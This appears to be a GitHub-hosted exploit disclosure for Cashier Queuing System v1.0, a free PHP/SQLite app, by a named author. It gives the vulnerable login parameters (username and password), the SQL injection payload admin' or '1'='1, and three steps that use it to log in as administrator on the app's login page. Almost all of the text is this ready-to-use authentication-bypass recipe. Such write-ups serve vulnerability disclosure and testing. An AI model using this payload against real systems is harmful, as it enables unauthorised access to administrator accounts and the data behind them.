Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: Cashier Queuing System V1.0 - SQL Injection Leads to the admin account
# Exploit Author: Kshitij Rewandkar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15047/cashier-queuing-system-live-monitor-and-voice-notification-php-and-sqlite-free-source
# Software Link: https://www.sourcecodester.com/php/15047/cashier-queuing-system-live-monitor-and-voice-notification-php-and-sqlite-free-source
# Version: v1.0
# Tested on: Windows 11, Apache
Description: An SQL injection issue in Cashier Queuing System v.1.0 allows an attacker to log in to the admin account.
Vulnerable Parameters:
username
password
Payload:
admin' or '1'='1
Steps:
1) Go to the Login page:- http://localhost/queuing/login.php
2) Now in username and password we put our payload
Payload:- admin' or '1'='1
3) Now when you click submit you get logged in